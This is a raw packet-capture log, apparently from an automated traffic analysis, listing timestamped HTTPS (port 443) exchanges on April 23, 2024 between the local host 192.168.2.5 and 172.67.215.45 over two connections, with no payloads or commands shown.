Apr 23, 2024 07:53:27.805665016 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.805690050 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.805712938 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.805880070 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.805895090 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.805947065 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.805953979 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.805980921 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.806005001 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.806493998 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.806512117 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.806569099 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.806577921 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.806619883 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.806932926 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.806948900 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.806996107 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.807003021 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.807029963 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.807051897 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.807718039 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.807746887 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.807815075 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.807821989 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.807893038 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.807934999 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.808156967 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.808180094 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.808226109 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.808232069 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.808270931 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.808279037 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.808717012 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.808732986 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.808779955 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.808787107 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.808813095 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.808839083 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.809078932 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.809097052 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.809176922 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.809178114 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.809185982 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.809227943 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.809925079 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.809941053 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.809998035 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.810005903 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.810050964 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.810358047 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.810375929 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.810420036 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.810427904 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.810455084 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.810477018 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.812558889 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.812575102 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.812633991 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.812647104 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.812664032 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.812699080 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.813292980 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.813308954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.813363075 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.813371897 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.813409090 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.813652039 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.813669920 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.813711882 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.813719034 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.813750029 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.813771963 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.813986063 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814002991 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814047098 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814054012 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814084053 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814111948 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814322948 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814338923 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814382076 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814388990 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814413071 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814435959 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814753056 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814769983 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814815998 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814821959 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.814842939 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.814865112 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.815377951 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.815395117 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.815443039 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.815449953 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.815474987 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.815500021 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.815916061 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.815931082 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.815980911 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.815989017 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.816020012 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.816040993 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.817589998 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.817606926 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.817661047 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.817670107 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.817682028 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.817713976 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.818325043 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.818340063 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.818393946 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.818403006 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.818428040 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.818449020 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.818872929 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.818887949 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.818934917 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.818943024 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.818967104 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.818991899 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.819324017 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.819341898 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.819395065 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.819401979 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.819458008 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.819488049 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.819777012 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.819792986 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.819984913 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.819984913 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.819993973 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820040941 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.820251942 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820267916 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820342064 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.820349932 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820395947 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.820879936 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820894957 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820952892 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.820960999 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.820986986 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.821007013 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.822264910 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.822279930 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.822325945 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.822333097 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.822364092 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.822386026 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.822815895 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.822832108 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.822879076 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.822885990 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.822910070 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.822971106 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.823656082 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.823673010 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.823719978 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.823725939 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.823750973 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.823774099 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.824477911 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.824495077 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.824546099 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.824553013 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.824590921 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.824614048 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.825176954 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.825191975 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.825247049 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.825257063 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.825267076 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.825295925 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.825640917 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.825656891 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.825705051 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.825711012 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.825742960 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.825762033 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.826016903 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.826034069 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.826078892 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.826086044 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.826097012 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.826122999 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.827017069 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.827033043 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.827081919 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.827090025 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.827121973 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.827675104 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.827694893 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.827745914 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.827753067 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.827785015 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.827805042 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.828244925 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.828259945 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.828303099 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.828310013 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.828330994 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.828345060 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.829158068 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.829166889 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.829214096 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.829221010 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.829236984 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.829256058 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.829804897 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.829822063 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.829859972 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.829866886 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.829888105 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.829910040 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.830420017 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.830435038 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.830477953 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.830485106 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.830513000 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.830532074 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.830626965 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.830697060 CEST	443	49729	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:27.830719948 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.830732107 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:27.833875895 CEST	49729	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.413264990 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.413315058 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.413389921 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.413731098 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.413743019 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.604315996 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.606373072 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.606398106 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827382088 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827552080 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827619076 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.827634096 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827729940 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827776909 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.827784061 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827887058 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.827925920 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.827934027 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828041077 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828094959 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.828110933 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828238010 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828285933 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.828294992 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828391075 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828437090 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.828445911 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828540087 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828594923 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.828602076 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828696012 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828741074 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.828747034 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828867912 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.828917027 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.828924894 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829022884 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829068899 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.829076052 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829180956 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829226971 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.829232931 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829772949 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829823017 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.829830885 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829952955 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.829999924 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.830008984 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830101967 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830154896 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.830163002 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830374002 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830420971 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.830430031 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830526114 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830570936 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.830579042 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830787897 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.830833912 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.830841064 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.831425905 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.831479073 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.831485987 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.831613064 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.831660986 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.831667900 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.831831932 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.831880093 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.831887007 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.832271099 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.832329035 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.832335949 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.879204035 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.915489912 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.915575027 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.915592909 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.915648937 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.915796041 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.915867090 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.916414022 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.916480064 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.916857004 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.916918039 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.917167902 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.917226076 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.917423964 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.917479038 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.917938948 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.918001890 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.918308020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.918374062 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.918473959 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.918533087 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.918723106 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.918778896 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.919778109 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.919843912 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.919869900 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.919929981 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.920011997 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.920068026 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.920175076 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.920248032 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.920869112 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.920929909 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.921608925 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:28.921668053 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:28.921715975 CEST	443	49731	172.67.215.45	192.168.2.5
